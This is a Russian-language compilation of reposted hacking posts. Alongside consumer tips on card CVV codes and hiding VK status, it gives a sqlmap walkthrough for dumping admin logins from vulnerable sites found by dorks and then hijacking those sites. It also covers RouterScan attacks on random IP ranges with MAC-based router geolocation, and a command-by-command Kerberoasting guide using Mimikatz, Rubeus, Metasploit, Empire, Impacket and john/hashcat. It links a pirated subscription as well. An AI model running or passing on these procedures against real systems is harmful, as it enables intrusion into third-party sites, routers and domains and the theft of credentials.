Всем привет! Я взял себе за привычку замазывать CVV коды на банковских картах. Это три цифры на задней стороне. Сегодня расскажу почему!

Во-первых, для чего нужны эти цифры? CVV код это по сути тот же самый PIN-код, но пинкод мы используем, когда оплачиваем покупки в живую, а CVV код, когда оплачиваем покупки через интернет.

Без CVV кода невозможно оплатить покупку в интернете, как и без других данных. Поэтому уже становится очевидно, почему нужно замазывать эти три цифры.

На самом деле, я не понимаю, почему их пишут на карте, этот код нужно также выдавать в конверте, чтобы его знал только владелец.

Но многие сейчас скажут, мол, ну и что, если этот код узнают, оплатить ведь без СМС невозможно! И будут неправы! Потому что я раньше тоже так думал, но оказалось, что на некоторых сайтах возможно оплатить без СМС кода.

У меня знакомый так "попался". Купил в одном из интернет магазинов электронику на 10 тыс. рублей, ввел все данные, в том числе и CVV. И вот, жмет "оплатить", готовый принять СМС код для оплаты. А в итоге знаете что?

В итоге, у него выскочило сообщение "Спасибо за покупку!". Он был в шоке в тот момент. Заблокировал карту и выпустил новую, потому что там у него была зарплата за несколько месяцев.

Поэтому я взял себе в привычку замазывать все трехзначные коды на своих банковских картах, дабы защитить деньги от мошенников!

Да, и еще один небольшой совет: для интернет-покупок лучше завести отдельную карту, так вы 100% не потеряете все свои деньги!

Внимание! Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством. А также это является авторская тема!

Всем привет, в этой статье будем дампить сайты. Меньше воды, больше скринов!

Способ первый:

Для начала вам нужны сайты с дырами, куда и будет инжектится все, для этого используйте дорки, вот вам в подарок 15к штук

https://pastebin.com/N6phV7TC

После того как получили список сайтов и нашли тот что нужен именно вам, бутимся в кали и бежим открывать Терминал,

в терминале пишем команду sqlmap -u "ваш cайт" --dbs

После проверки и инжекта он выдаст вам что то в этом роде, это база данных

После этого открываем нужную БД в виде тэйблов командой sqlmap -u "cайт" -D "ваша база данных" --table

Нам выдаст примерно вот такой вот списочек

Из этого списка ищем что то с тематикой админки, например

Теперь дампим этот тэйбл командой sqlmap -u "cайт" -D "ваша база данных" -T "ваш тейбл" --dump

Получаем вот такую вот схему логин пароль статус имя и тд...

Это и есть логин и пароль к сайту в качестве Админа.

Находим страничку логина для админок это обычно например что то такое http://site.com/admin

хотя в инете куча прог которые сделают это за вас, кому нужно погуглит

видим такую картину и пытаемся залогинится

Вуаля, ваш взломанный сайт готов!

исходя из того что это за сайт вы можете его использовать по разному, например менять баннеры рекламы и направлять трафик себе на сайт, страничку, YT и так далее.

Способ второй:

В данном способе будем использовать программу FOCA. Это такой мощный инструмент для извлечения и анализа метаданных. Так вот, Foca может извлекать данные из файлов Microsoft Office, PDF файлов, графических файлов и т.д. Foca может вытаскивать подробную информацию о месте где производилась фотосъёмка по сохранённым GPS данным.

Возможности ее таковы:

- extracts metadata from Open Office, MS Office, PDF, EPS and graphic documents.

- network discovery

- fingerprinting

- DNS Cache Snooping

- discover what websites the internal users of a network are browsing on.

- exports data into a report.

Судя по всему инструмент бесплатный, к сожалению сайт разработчика этого инструмента на сегодня умер. Поэтому проверить актуальную версию возможности нет. Тем не менее инструмент полезный, мне удалось найти версию 3.0.

Foca анализирует данные с файлов которые она выкачивает с сети, т.е. web-сайта. Локальные файлы для анализа вы можете добавить просто по выпадающей менюшке, пункт "Add file".

Вы просто создаете новый проект, вводите сайт, и ждете пока все загрузится. А дальше все очень легко, можно изымать фотки, файлы, видео, которые находятся на всем разделе сайта и поддоменов. Даже показывает почты, которые могли быть привязаны к этому сайту. И из этих данных можно брать еще метаданные, получая инфу он устройствах и т.д.

После того Что вы найдете встает вопрос как это все очистить.)

Для тех из вас, кто хочет избавиться от любых персональных метаданных из любых данных, которые будут разделены с другими, есть способы удалить метаданные из информации о файлах. Вы можете использовать существующий редактор документов или изображений, которые обычно имеют встроенные возможности редактировать метаданные. Но есть отличный отдельный инструмент по очистке метаданных, которые разработан для единственной цели: анонимизировать все метаданные для вашей приватности.

Более подробно рассказано тут - https://telegra.ph/Exiftool-Udalenie-metadannyh-i-sledov-s-fotografij-11-22

MAT (Metadata Anonymisation Toolkit - инструментарий анонимизации метаданных) - это отдельный чистильщик метаданных, написанный на Python.

Требования:

• Windows XP или более поздняя;

• .NET Framework 4 или более поздняя;

• WinPcap library.

Скачать программу можно здесь https://github.com/ElevenPaths/EvilFOCA/.

Способ третий:

adfind

Поисковик панелей администрирования (админок, панелей управления).

Домашняя страница: https://github.com/sahakkhotsanyan/adfind

Автор: Sahak Khotsanyan

Примеры запуска adfind

Найти административные панели всех типов (all) на целевом сайте (http://example.com):

adfind http://example.com all

Установка adfind

Установка в Kali Linux

git clone https://github.com/sahakkhotsanyan/adfind.git

cd adfind*

sudo cp adfind /bin/adfind

sudo chmod +x /bin/adfind

adfind -h

Установка в BlackArch

Программа предустановлена в BlackArch.

Информация об установке в другие операционные системы будет добавлена позже.

источник - https://zen.yandex.ru/media/id/5a994b04a815f12772fa0f1e/vzlom-saitov-cherez-kali-linux-5e2bb13d0ce57b00ae33133c

Имейте ввиду,незаконное проникновение карается законом.Канал не несёт ответственности

• Для начала нам понадобится программа RouterScan: https://mega.nz/#!HDBkhaTZ!pXkc6u84mQEbn0sUbAfO9xgtgfZv0lTFfZU23eBSlc8

Программу можно установить распаковав из архива файлов в заданную папку. Программа производит атаку по портам

• 80
• 8080
• 1080

Считаем это в список вполне оправданным требующим никаких дополнительных изменений.

Кроме того, в программе имеется возможность подключить дополнительные модули. Но такая загруженность программы, существенно замедлит ее работу. Поэтому в этом окне ничего трогать не будем. Ведь целью атаки является доступ к веб интерфейсу одного случайного роутера.

2.Осталось выбрать только диапазон айпи для атаки и можно запускать программу.

Ищем диапазоны IP нужного нам города/страны на сайте: https://4it.me/getlistip

Копируем нужное кол-во диапазонов,и идём в программу

3.Вставляем диапазоны сюда:

4.Нажимаем на старт:

5.Все успешные попытки будут отображаться во вкладке Good results

Тут мы увидим и данные для входа

6.Во вкладке Status Находим мак адрес точки доступа:

7. Переходим на сайт http://mobile.maps.yandex.net/cellid_location/?clid=1866854&lac=-1&cellid=-1&operatorid=null&countrycode=null&signalstrength=-1&wifinetworks=:-65&app=ymetro

После "wifinetworks=" нужно вписать мак адрес без разделений.Пример:wifinetworks=f07d685b27d8

И далее нажимаем enter.У нас высветятся координаты

8.Идём в Google/Yandex карты,вбиваем координаты.Сначала Широта/Latitude, потом долгота/longitude

Источник - https://zen.yandex.ru/media/id/5a994b04a815f12772fa0f1e/vzlom-routerov-i-poisk-ih-mestopolojeniia-5e2bb519e3062c00b0748c03

Вступление

Сегодня хакеры научились взламывать не только аккаунты, но и сеть Wi-Fi. Мы обсудим как защититься от такой атаки. Статья получится короткой так как, к сожалению, еще нет подробного решения этой уязвимости.

Безопасность

Для взлома хакер использует BruteForce (грубая сила), из моих предыдущих статей можно подробней узнать об этом способе взлома, а если коротко, то это перебор паролей.

Если Вы пользуетесь сетью без пароля, то крайне рекомендую поставить пароль. Без пароля любой желающий получить доступ к вашей сети.

Защита

Бороться со взломом очень трудно. Так как нет защиты специально для Wi-Fi. Единственное остаётся, это быть бдительными и почаще менять пароль (примерно раз в месяц). При этом если вас уже взломают, то с новым паролем взломщику придётся делать всё заново.

«Kerberos предназначен для аутентификации, а не для авторизации, это упущение позволяет воспользоваться атакой Kerberoasting»

Содержание статьи

Раздел 1: процедура прохождения аутентификации Kerberos

• Kerberos и его главные компоненты
• Kerberos: система сообщений

Раздел 2: Имя субъекта службы SPN

• Важные моменты
• Синтаксис SPN состоит из четырех элементов
• Вид SPN

Раздел 3: Пошаговое руководство по атаке Kerberoasting

• Что такое Kerberoasting
• Последовательность действий атаки Kerberoasting

Часть 1: Старая процедура осуществления Kerberoasting в операционной системе

• Скрипт Powershell
• Mimikatz

Часть 2: Новая процедура осуществления Kerberoasting в операционной системе

• exe
• Cкрипт ps1

Часть 3: Старая процедура осуществления Kerberoasting дистанционно

• Powershell Empire
• Metasploit

Часть 4: Новая процедура осуществления Kerberoasting дистанционно

• PowerShell Empire
• Metasploit
• Impacket

Раздел 1: процедура прохождения аутентификации Kerberos

Структура:

• Kerberos и его основные компоненты
• Kerberos: система сообщений

Kerberos и его основные компоненты

Протокол Kerberos определяет способ того, как клиенты взаимодействуют со службой сетевой аутентификации. Пользователи получают билеты из центра распространения ключей Kerberos (KDC) и отправляют их на серверы приложения при установлении соединения. По умолчанию используется UDP-порт номер 88, и вся процедура зависит от процесса шифрования с помощью симметричной криптографии.

«Kerberos использует билеты для аутентификации пользователя и избегает отправки паролей по сети»

Есть несколько ключевых компонентов прохождения аутентификации Kerberos, которые играют важную роль в процессе проверки подлинности.

Kerberos: система сообщений

В домене Active Directory каждый контроллер домена запускает службу KDC (центр выдачи ключей Kerberos), которая обрабатывает запросы на билеты в Kerberos. Для билетов Kerberos AD использует учетную запись KRBTGT в домене AD.

На рисунке ниже показано, что основная роль, которую играет KDC в установлении безопасного соединения между сервером и клиентом, заключается в использовании некоторых специальных компонентов, указанных в таблице выше.

Как уже упоминалось выше, Kerberos использует симметричную криптографию для шифрования и дешифрования. Стоит разобраться подробнее и понять, как зашифрованные сообщения отправляются друг другу. Здесь используются три цвета для различения хэшей:

• BLUE _KEY: хэш пользователя NTLM
• YELLOW_KEY: хэш krbtgt NTLM
• RED_KEY: хэш сервиса NTLM

Шаг 1. Отправив запрос в KDC, клиент устанавливает связь следующим образом:

KRB_AS_REQ содержит в себе такие данные, как:

• Имя пользователя, подлежащего проверке подлинности
• Имя субъекта службы (Service PRINCIPAL NAME), связанное с учетной записью Krbtgt
• Зашифрованная временная метка (защищенная хэшем пользователя: синий ключ)

Все сообщения шифруются с помощью хэша пользователя NTLM (защищенного синим ключом) для проверки подлинности данных пользователя и предотвращения повторных атак.

Шаг 2. KDC использует базу данных, состоящую из хэшей Users / Krbtgt / Services, для расшифровки сообщения (синий ключ), за счет которого производится аутентификация пользователя.

Затем KDC генерирует TGT (Ticket Granting Ticket) для клиента, данные которого зашифрованы с помощью хэша Krbtgt (желтый ключ) и сообщения с использованием хэша пользователя.

KRB_AS_REP содержит в себе следующие данные:

• Имя пользователя
• Некоторые зашифрованные данные (защищенные пользовательским хэшем: синий ключ):
• Ключ сеанса сессии
• Конечный срок действия TGT
• TGT (защищенный хэшем krbtgt: желтый ключ), в котором находятся: имя пользователя, ключ сеанса связи, конечный срок действия TGT, PAC с правами пользователя, подписанный KDC.

Шаг 3. KRB_TGT будет храниться в памяти Kerberos компьютера, так как пользователь уже имеет KRB_TGT, который используется для идентификации своего устройства для запроса TGS. Клиент отправляет копию TGT с зашифрованными данными в KDC.

KRB_TGS_REQ содержит в себе следующие данные:

• Зашифрованные данные с помощью ключа сеанса связи
• Имя пользователя
• Отметку времени
• TGT
• SPN запрашиваемой службы, например, SQL

Шаг 4. KDC получает сообщение KRB_TGS_REQ и расшифровывает его с помощью хэша Krbtgt для проверки TGT (желтый ключ), затем KDC возвращает TGS как KRB_TGS_REP, который зашифрован с помощью запрошенного служебного хэша (красный ключ) и зашифрованного сообщения с использованием пользовательского хэша.

KRB_TGS_REP содержит в себе следующие данные:

• Имя пользователя
• Зашифрованные данные с помощью ключа сеанса связи:
• Ключ сеанса обслуживания
• Конечный срок действия TGS
• TGS (служебный хэш: красный ключ), который включает:
• Ключ сеанса обслуживания
• Имя пользователя
• Конечный срок действия TGS
• PAC с правами пользователя, подписанный KDC.

Шаг 5. Пользователь отправляет копию TGS на сервер приложения.

KRB_AP_REQ содержит:

• TGS
• Зашифрованные данные с помощью ключа сеанса связи:
• Имя пользователя
• Отметка времени для предотвращения повторных атак

Шаг 6. Приложение пытается расшифровать сообщение с помощью своего хэша NTLM и проверить PAC от KDC, чтобы определить привилегию пользователя (необязательно)

Шаг 7. KDC проверяет PAC (необязательно)

Шаг 8. Пользователь получает доступ к сервису на определенный период времени.

Раздел 2: Имя субъекта службы SPN

Содержание:

• Важные моменты
• Синтаксис SPN состоит из четырех элементов
• Вид SPN

Имя субъекта службы SPN

Имя субъекта службы SPN — это уникальный идентификатор экземпляра сервиса. Доменные службы Active Directory и Windows обеспечивают поддержку имен субъектов служб (SPN), которые являются ключевыми компонентами механизма Kerberos, позволяющие клиенту проходить аутентификацию.

Важные моменты:

• Если устанавливается несколько экземпляров службы на компьютерах одной сети, каждый экземпляр должен иметь свое имя SPN.
• Прежде чем служба аутентификации Kerberos сможет использовать имя субъекта службы для прохождения аутентификации, имя субъекта службы должно быть зарегистрировано в учетной записи.
• SPN может быть зарегистрировано только на одном аккаунте.
• SPN должно быть уникальным в той сети, в которой оно зарегистрировано.
• Если оно не уникально, при аутентификации произойдет сбой.

Синтаксис SPN состоит из четырех элементов

Вид SPN

• SPN на основе хоста, которые связаны с учетной записью компьютера в AD, представляют собой случайно сгенерированный 128-символьный пароль, который меняется каждые 30 дней, поэтому он и не используется при атаках Kerberoasting.
• Для SPN, которые были связаны с учетной записью пользователя домена, будет использоваться хэш NTLM.

Раздел 3: Пошаговое руководство по атаке Kerberoasting

Содержание:

• Что такое Kerberoasting
• Последовательность действий при атаке Kerberoasting

Часть 1: Старая процедура осуществления Kerberoasting в операционной системе

• Скрипт Powershell
• Mimikatz

Часть 2: Новая процедура осуществления Kerberoasting в операционной системе

• exe
• Cкрипт ps1

Часть 3: Старая процедура осуществления Kerberoasting дистанционно

• Powershell Empire
• Metasploit

Часть 4: Новая процедура осуществления Kerberoasting дистанционно

• PowerShell Empire
• Metasploit
• Impacket

Что такое Kerberoasting

Kerberoasting — это метод, который позволяет злоумышленнику украсть билет KRB_TGS, зашифрованный с помощью RC4, чтобы перебить хэш приложения для получения пароля.

Как было упомянуто выше, Kerberos использует хэш NTLM запрашиваемой службы для шифрования билета KRB_TGS для заданных имен участников службы (SPN). Когда пользователь домена отправляет запрос на билет TGS контроллеру домена KDC для любой службы, которая зарегистрировала SPN, KDC генерирует KRB_TGS без идентификации данных для авторизации пользователя запрашиваемой службы.

Злоумышленник может использовать этот билет в автономном режиме для подбора пароля учетной записи службы, так как билет был зашифрован в RC4 с помощью NTLM-хэша учетной записи службы.

Последовательность действий при атаке Kerberoasting

Атака представляет собой многоэтапный процесс, как показано ниже на картинке.

Шаг 0. Получение доступа к клиентской системе доменной сети всеми правдами и неправдами.

Шаг 1. Обнаружение или сканирование зарегистрированного SPN.

Шаг 2 . Отправка запроса на билет TGS для обнаруженного SPN с помощью Mimikatz или любой другой программы.

Шаг 3. Сброс билета TGS, который может иметь формат .kirbi или ccache или быть служебным хэшем (в некоторых случаях).

Шаг 4. Преобразование .kirby или ccache в необходимый формат для взлома.

Шаг 5: Использование словаря для лобовой атаки.

Есть старые и новые способы атаки Kerberoasting на локальном компьютере или дистанционно.

Старая процедура: это методы, в которых выполняется несколько шагов Kerberoasting.

Новая процедура: это одношаговый метод, используемый для осуществления Kerberoasting.

Часть 1: Старая процедура осуществления Kerberoasting в операционной системе

Метод 1. Скрипт Powershell.

Шаг 1. Обнаружение SPN.

Нужно скачать Find-PotentiallyCrackableAccounts.ps1 и Export-PotentiallyCrackableAccounts.ps1 по ссылке на компьютер. Эти скрипты найдут SPN и сохранят выходные данные в формате CSV.

Import-Module .Find-PotentiallyCrackableAccounts.ps1
Find-PotentiallyCrackableAccounts.ps1 -FullData -Verbose
Import-Module .Export-PotentiallyCrackableAccounts.ps1
Export-PotentiallyCrackableAccounts

Другой скрипт PowerShell Getuserspn. ps1, скачать который можно здесь, будет запрашивать домен, чтобы обнаружить SPN, которые используют учетные записи пользователей. Как можно заметить, было найдено имя SPN с помощью следующей команды.

.\GetUserSPns .ps1

Для того чтобы импортировать модуль в PowerShell, выполняется команда, которая пронумерована именем субъекта службы SQL.

Шаг 2. Извлечение, сброс TGS_ticket и получение хэша

На картинке происходит попытка извлечения KRB_TGS из внутренней памяти хоста с помощью другого сценария PowerShell под названием TGSCipher. ps1, который можно скачать здесь и одновременно преобразовать вывод запроса в формат John.

Get-TGSCipher -SPN "WIN-S0V7KMTVLD2/SVC_SQLService.ignite.local:60111" -Format John

В результате получена хэш-строка для службы SQL.

Шаг 3. Обработка хэша с помощью лобовой атаки.

Это последняя и самая важная фаза, когда используется словарь для лобовой атаки хэша, поэтому сохраняется вышеупомянутый хэш в текстовом файле и выполняется следующая команда.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

Ура! Ура! Была успешно осуществлена атака Kerberoasting и получен пароль для службы SQL.

Метод 2. Mimikatz

Аналогично можно использовать mimikatz для проведения всей атаки, что означает, что программа может быть применена для обнаружения SPN и сброса билета TGS.

Шаг 1. Обнаружение SPN

Загрузите и выполните команды mimikatz и Kerberos::list для обнаружения SPN.

.\mimikatz.exe
kerberos::list

Шаг 2. Сброс билета TGS

Выполните команду export для извлечения билета с именем, содержащим формат .kirbi.

kerberos::list /export1

Шаг 3. Преобразование Кирби в хэш и его лобовая атака

Полученное имя файла переименовано в raj.kirbi и в формат для взлома с помощью kirbi2john.py (/usr / share/john/). Получено имя kirbihash, затем используется John для лобовой атаки, как и в 1-м методе.

mv "1-40a5000…..kirbi" "raj.kirbi"
/usr/share/john/kirbi2john.py raj.kirbi > kirbihash
john --wordlist=/usr/share/wordlists/rockyou.txt kirbihash

Часть 2: Новая процедура осуществления Kerberoasting в операционной системе

Метод 1. Rubeus.exe

Шаг 1. Обнаружение SPN, сброс TGS, получение хэша (за один шаг)

Rebeus.exe — это потрясающая утилита, поскольку она идет в паре с модулем kerberoast, который обнаруживает SPN, извлекает и сбрасывает TGS и хэш службы. Это можно сделать с помощью следующей команды.

Rubeus.exe kerberoast /outfile:hash.txt

Шаг 2. Лобовое нападение на хэш

Итак, служебный хэш был сохранен в текстовом файле hash.txt и теперь используется словарь для лобовой атаки на хэш и извлечения пароля с помощью инструмента hashcat.

hashcat -m 13100 --force -a 0 hash.txt dict.txt

В результате был получен пароль от сервиса.

Метод 2. Скрипт Kerberoast PowerShell

Шаг 1. Обнаружение SPN, сброс TGS, получение хэша (все за один шаг)

Kerberoast. ps1 – это скрипт PowerShell, который аналогичен приведенному выше модулю, его можно скачать по ссылке. Он обнаруживает SPN, извлекает TGS и сбрасывает служебный хэш. Это делается с помощью следующих команд.

Import-Module .Invoke-kerberoast.ps1
Invoke-kerberoast

Как только служебный хэш получен, нужно следовать приведенному выше методу подбора пароля.

Шаг 2. Лобовая атака хэша

Процедура повторяется для лобовой атаки хэша.

Часть 3: Старая процедура осуществления Kerberoasting дистанционно

Метод 1. Metasploit

• Скрипт PowerShell с помощью meterpreter
• Скрипт ps1-ESPN Discovery
• Утилита Setspn
• ps1
• Mimikatz с помощью Metasploit
• Скрипт PowerShell с помощью meterpreter

Шаг 1. Обнаружение SPN

Можно скачать Find-PotentiallyCrackableAccounts.ps1 и Export-PotentiallyCrackableAccounts.ps1 здесь на локальный компьютер и загрузить его на хост-компьютер через сеанс meterpreter. После следует запустить PowerShell для получения удаленного доступа.

Эти скрипты выявят SPN и сохранят выходные данные в формате CSV.

Import-Module .Find-PotentiallyCrackableAccounts.ps1
Find-PotentiallyCrackableAccounts -FullData -Verbose
Import-Module .Export-PotentiallyCrackableAccounts.ps1
Export-PotentiallyCrackableAccounts

Скачивание Report.csv на локальный компьютер.

Файл report.csv будет содержать список SPN, доступных в хост-системе.

SPN Discovery Utility

Другой метод – организации сеанса meterpreter путем компрометации компьютера-хоста и загрузки PowerShell. Использование утилиты setspn поможет пронумеровать все имена в домене.

setspn -T ignite -Q */*

Как можно заметить, снова обнаружены SPN для службы SQL.

Шаг 2. Определение, сбрс TGS_ticket и получение хэша

Скачивание скрипта PowerShell TGSCipher.ps1 и одновременное преобразование выходного запроса в формат John.

Import-Module .Get-TGSCipher.ps1
Get-TGSCipher -SPN "WIN-S0V7KMTVLD2/SVC_SQLService.ignite.local:60111" -Format John

В результате получена хэш-строка для службы SQL.

Шаг 3. Лобовая атака хэша

Повторяется такая же процедура лобовой атаки хэша.

Mimikatz с помощью Metasploit

После того, как у вас настроен сеанс meterpreter хост-системы, можно попробовать загрузить mimikatz.exe, а затем выполнить все шаги, описанные в первой части третьего раздела.

Шаг 1. Обнаружение SPN

Скачивание и выполнение команд mimikatz и Kerberos::list для обнаружения SPN.

.\mimikatz.exe
kerberos::list

Шаг 2. Взлом билета TGS

Выполнение команды экспорта для извлечения билета с форматом .kirbi

kerberos::list /export

Загрузка файла в формате .kirbi на локальный компьютер, чтобы преобразовать его в формат для взлома.

Шаг 3. Преобразование Кирби в хэш и его лобовая атака

Снова полученное имя фала 2-40a5000…..kirbi было переименовано в raj.kirbi с помощью kirbi2john.py (/usr / share/john/) для использования во время взлома под названием localhash. Затем применяется John для лобовой атаки, как это делалось и в других методах.

mv "40a5000.....kirbi" "local.kirbi"
/usr/share/john/kirbi2john.py local.kirbi > localhash
john -–wordlist=/usr/share/wordlists/rockyou.txt localhash

Метод 2. PowerShell Empire

Шаг 1. Обнаружение SPN с помощью setspn, как было указано ранее (необязательно для этого модуля)

Шаг 2. Извлечение, сброс TGS_ticket и получение хэша

Как только у пользователя есть empire agent, выполняется приведенный ниже модуль, который извлекает и сбрасывает (взламывает) файл формата .kirbi для билета TGS.

usemodule credential/mimikatz/extract_tickets
execute

Шаг 3. Преобразование Kirbi в хэш, а затем использование лобовой атаки

Также может быть применен tgscrack.py, специальный скрипт для python, который адаптирует формат .kirbi для взлома, а затем лобовой атакой хэша извлекает пароль. Скачать его можно по этой ссылке, после чего должны быть выполнены следующие команды.

mv [kirbi_file] [new.kirbi]
python extractServiceTicketParts.py [path_of_new.kirbi_file] > ignitehash
go run tgscrack.go -hashfile ignitehash -wordlist /usr/share/wordlists/rockyou.txt

Часть 4: Новая процедура осуществления Kerberoasting дистанционно

Метод 1. PowerShell Empire

Шаг 1. Обнаружение SPN, сброс TGS, получение хэша (все за один шаг)

Как только у пользователя появляется Empire / agent, нужно загрузите модуль invoke_kerberoast. Это эффективный модуль, поскольку он обнаруживает SPN, извлекает билет и взламывает служебный хэш из шифра TGS.

usemodule credentials/invoke_kerberoast
execute

Как можно наглядно увидеть, он сбросил хэш сервиса в течение секунды.

Шаг 2. Лобовая атака хэша

Процедура лобовой атаки хэша повторяется еще один раз.

Метод 2. Metasploit

Шаг 1. Обнаружение SPN, взлом TGS, получение хэша (все за один шаг)

Любители интерфейса Metasploit после получения доступа к сеансу meterpreter могут загрузить PowerShell и скачать скрипт kerberoast.ps1 по этой ссылке. Он находит SPN, извлекает билет TGS, а затем взламывает служебный хэш из шифра TGS.

powershell_import /root/powershell/Invoke-kerberoast.ps1
powershell_execute Invoke-Kerberoast

Шаг 2. Лобовая атака хэша

Процедура лобовой атаки хэша повторяется еще раз.

Метод 3. Impacket

Шаг 1. Обнаружение SPN, сброс TGS, получение хэша (все за один шаг)

Используется встроенный модуль Impacket GetUSerSPNs.py, это особый скрипт для python, который находит SPN, извлекает TGS и сбрасывает служебный хэш. Сделать это можно с помощью следующей команды:

./GetUserSPNs.py -request -dc-ip 192.168.1.105 ignite.local/yashika

Он будет взламывать служебный хэш, и с помощью словаря появится возможность подобрать необходимый пароль.

Шаг 2. Лобовая атака хэша

Повтор процедуры лобовой атаки хэша еще раз.

john –wordlist=/usr/share/wordlists/rockyou.txt hashes

Читать подробнее из источника на английском можно по ссылке.

Источник - https://zen.yandex.ru/media/id/5ea414fcd59a0771a9fa8b8b/chto-takoe-ataka-kerberoasting-5ee12e09df721c0d7a24a95f

Почему же люди хотят скрыть свое пребывание онлайн ВКонтакте? Причин для это много, вот основные из них:

• Тотальный контроль работника со стороны работодателя. Некоторые начальники отслеживают страницы своих подчиненных, чтобы убедиться, что те не сидят в социальных сетях в рабочее время. Тогда случайный выход смартфона в ВК окажется совсем некстати.
• Желание скрыться от определенных людей из списка друзей, будь то надоевший ухажер или слишком ревнивая девушка.
• Возможность избавиться от навязчивых предложений о работе или по развитию своего «бизнеса». Обычно такие люди выбирают пользователей в сети, чтобы обрабатывать их ответы сейчас, а не откладывать переписку на потом.
• Нежелание общаться с кем-либо. Иногда в сеть выходят, чтобы просто послушать музыку или узнать последние новости. И сообщения от друзей в этот момент могут оказаться некстати.

Через саму социальную сеть

К сожалению, сервис ВКонтакте не предусмотрел функции, чтобы пользователь мог скрыть свой онлайн статус. Но существует несколько вариантов, которые позволяют оставаться в сети и быть невидимкой для всех.

Есть один простой способ скрыть свой статус онлайн, но при этом просматривать новости, слушать музыку, читать сообщения и даже написать ответ. Сделать это можно следующим образом:

• зайти на свою страницу с компьютера (для смартфона этот способ не подходит);
• перейти во вкладку «Сообщения»;
• не выполнять никаких действий в течение 20 минут.

И все! После этого ВКонтакте решит, что человек больше не в сети и поменяет его статус на оффлайн. Юзер будет незаметен только до тех пор, пока не перейдет на свою страницу или любого другого пользователя. В этом и заключается главный минус данного способа – ограниченный перечень возможностей для «оффлайн» режима (только просмотр новостей, прослушивание музыки, чтение сообщений).

Также к недостаткам можно отнести и то, что пользователь ненадолго все равно засветится в сети. Так что тем, кто желает и вовсе не появляться в онлайн, следует рассмотреть другие варианты.

Через программы для компьютера

Существуют программы, использование которых позволяет скрыть онлайн-статус человека. В сети можно встретить много предложений. Но стоит помнить, что использование неофициальных и сомнительных программных продуктов может привести к тяжелым последствиям: заражению компьютера вирусами, взлом устройства или кража личной информации пользователя.

Одной из наиболее известных программ, которые помогают стать невидимкой, является Apidog. Все, что нужно сделать пользователю, это перейти на стартовую страницу сервиса и заполнить обязательные поля, указав логин и пароль своего профиля, а также выбрать операционную систему устройства.

Помните, что передавая эти данные, вы разрешаете доступ к вашей странице ВК, а это может быть небезопасно. Рекомендуется периодически менять пароль от своего профиля и проверять историю сессий в настройках. Обратите внимание и на то, что перед вводом данных необходимо убедиться, что адрес страницы правильный. В сети можно натолкнуться на страницы мошенников, которые охотятся за личными данными пользователей под видом подобных приложений.

С помощью мобильного приложения

С появлением смартфонов большинство пользователей заходят в социальные сети через мобильные приложения. Это намного удобнее, проще и быстрее. Поэтому, чтобы стать невидимкой в сети, можно использовать специальные мобильные приложения. Рассмотрим основные из них.

Мессенджер VK Me

Cервис Vk.me используется для быстрого и простого общения ВКонтакте, но при этом может помочь скрыть статус онлайн. Для этого нужно:

• загрузить и установить приложение;
• авторизоваться в нем (если на смартфоне установлено мобильное приложение ВК, то авторизация пройдет автоматически);
• зайти в раздел настройки профиля, перейти в раздел «Конфиденциальность», нажать на пункт «Кто видит, что я онлайн», и выбрать один из вариантов, предложенных сервисом (только я, все друзья, добавить исключения и т.д.).

Когда выберете нужные настройки, статус «онлайн» сменится на «заходил недавно». Но только для выбранной категории людей, которым не должны быть видно реальное присутствие юзера в сети. Главным недостатком приложения является то, что и сам пользователь будет видеть аналогичный статус у выбранных людей, что не всегда бывает удобным.

Kate Mobile

Мобильное приложение для смартфонов на базе Андроид. Его можно найти и скачать в официальном магазине. Сервис имеет множество функций, среди которых и возможность стать невидимым. Для этого нужно:

• зайти в свой профиль через приложение;
• перейти в меню и выбрать раздел «Настройки»;
• нажать на кнопку «Онлайн» (настройки невидимости);
• в появившемся окне выбрать соответствующий пункт («По возможности быть невидимым»).

После этого пользователь становится невидимым для других людей. Но если он обновит новости, сделает репост или опубликует новое сообщение, то снова станет открытым для всех.

Swist Feed

Для пользователей продуктами Apple компания разработала специальное приложение Swist Feed. Среди прочих функций оно позволяет оставаться невидимым и при этом выполнять практически все действия в социальной сети, например, слушать музыку, создавать посты, читать и обновлять новости. Все, что нужно юзеру, это перейти в настройки и передвинуть ползунок на кнопке «Режим невидимка».

Через браузер

Утаить режим онлайн можно, воспользовавшись специальным расширением VKfox. Оно подходит для браузеров Firefox, Opera и Google Chrome. Чтобы стать невидимым, необходимо выполнить следующие действия:

• найти и установить расширение на компьютер (через официальный магазин или по ссылкам предоставленным выше);
• дать приложению доступ к своему профилю ВК;
• кликнуть на значок лисички, который появится в правом верхнем углу;
• в открывшемся окне поставить крестик в строке «Быть всегда оффлайн».

Выполнив эти несложные действия, пользователь сможет сидеть на сайте, пользоваться полным функционалом сервиса ВК, но при этом оставаться невидимым для всех остальных. Особенностью этого способа является и то, что если хочет пользователь, он может выбрать обратный эффект. То есть быть онлайн всегда, даже когда страница профиля закрыта. Для этого нужно совершить те же действия, только вместо крестика поставить галочку в строке «Быть всегда онлайн».

Выше было приведено несколько способов, как скрыть свой статус онлайн, находясь в сети. Все они достаточно просты и доступны. Пользователь сможет самостоятельно выбрать самый лучший вариант из предложенных. И тогда получится пользоваться социальной сетью без опаски получить выговор от начальства или столкнуться со скандалами ревнивой возлюбленной.

Прежде чем воспользоваться скаченной программой, необходимо убедиться, что она является безопасной. Чтобы не столкнуться с мошенниками, следует скачивать приложения только с официальных магазинов и тщательно проверять адреса посещаемых сервисов. При соблюдении всех правил безопасности угрозы взлома и утечки персональных данных нет.

Если вам понравилась наша статья, то делитесь ею в социальных сетях и обязательно подписывайтесь на обновления блога, чтобы не пропустить много чего интересного!

Источник: https://aflife.ru/socialnye-seti/vkontakte/kak-skryt-chto-ty-onlajn-vkontakte

Начнём с описания.

Это обычный Boom, только бесплатный и подписка до 2077 года. Платить ни за что не нужно, нужно только немного времени.

Установка

Удаляем Boom если есть.

Скачиваем файл по ссылке.

Ну и все)

Источник - https://zen.yandex.ru/media/id/5ee21c383b51303dbb21c99e/podpiska-boom-do-2077g-5ee235204552bb53f3024859

Что означает социальная инженерия? Основы манипуляции.

Социальная инженерия это наука, которая позволяет найти коммуникации с людьми и выяснить все что вам необходимо. В статье мы раскроем основы этой интересной науки.

Согласно статистике и практике взломов высокозащищённых ресурсов в большей мере уязвимость находится со стороны людей, которые в силу непрофессионализма, безответственности или недостатка знаний подвергли сервера атакам. Наибольшая проблема – это склонность людей к передаче всей информации и совершению нелогичных действий.

